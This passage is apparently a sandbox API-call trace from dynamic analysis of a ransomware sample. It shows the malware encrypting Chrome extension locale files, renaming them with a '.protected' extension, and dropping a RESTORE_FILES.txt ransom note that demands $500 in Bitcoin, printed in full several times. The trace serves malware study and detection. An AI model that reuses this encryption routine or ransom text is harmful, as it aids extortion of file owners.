lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.963] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.963] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.963] CloseHandle (hObject=0x164) returned 1 [0083.963] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0083.963] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr") returned 150 [0083.963] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0083.964] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*") returned 152 [0083.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.964] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.964] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.964] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.964] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.964] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\.") returned 152 [0083.964] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.964] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.964] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.964] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.964] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.964] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\..") returned 153 [0083.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.964] 
lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.964] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.964] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.965] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.965] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.965] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.965] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.966] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.967] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.967] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.967] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.967] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.967] CloseHandle (hObject=0x168) returned 1 [0083.967] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.protected") returned 174 [0083.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.protected")) returned 1 [0083.968] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.968] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.968] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\RESTORE_FILES.txt") returned 168 [0083.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.968] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.968] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, 
lpOverlapped=0x0) returned 1 [0083.969] lstrlenA (lpString="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") returned 684 [0083.969] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.969] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.969] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.969] CloseHandle (hObject=0x164) returned 1 [0083.969] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0083.969] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv") returned 150 [0083.969] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0083.969] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0083.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*") returned 152 [0083.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.970] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.970] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.970] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.970] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.970] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\.") returned 152 [0083.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.970] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.970] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.970] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.970] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.970] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\..") returned 153 [0083.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.970] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.970] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.970] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.971] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.971] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.971] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.971] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.971] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.971] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.971] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.973] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.973] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.973] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.973] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.973] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.973] CloseHandle (hObject=0x168) returned 1 [0083.973] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.protected") returned 174 [0083.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.protected")) returned 1 [0083.974] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.974] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\RESTORE_FILES.txt") returned 168 [0083.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.974] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.974] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, 
nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.975] lstrlenA (lpString="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") returned 684 [0083.975] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.975] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.975] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.975] CloseHandle (hObject=0x164) returned 1 [0083.975] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="Windows") returned -1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="Program Files") returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="Program Files (x86)") returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="$Recycle.bin") returned 1 [0083.975] lstrcmpiW (lpString1="sw", lpString2="System Volume Information") returned -1 [0083.975] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw") returned 150 [0083.975] lstrcmpW (lpString1="sw", lpString2=".") returned 1 [0083.975] lstrcmpW (lpString1="sw", lpString2="..") returned 1 [0083.975] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
